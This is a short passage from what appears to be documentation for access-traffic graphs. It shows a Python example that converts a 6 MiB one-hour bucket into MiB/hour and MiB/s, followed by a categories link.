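start = datetime(2026, 2, 1, 10, 0, tzinfo=timezone.utc)
end = datetime(2026, 2, 1, 11, 0, tzinfo=timezone.utc)
mib, mib_s, secs = bucket_mib(6 * 1024 * 1024, start, end)
print(mib, secs)  # -> 6.0 3600
```

A 1-hour bucket totalling 6 MiB therefore plots as 6.0 MiB/hour, and the per-second rate is 6/3600 MiB/s.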

categories

See https://publications.arising.com.au/pub/Publications_Access_Graphs#categories.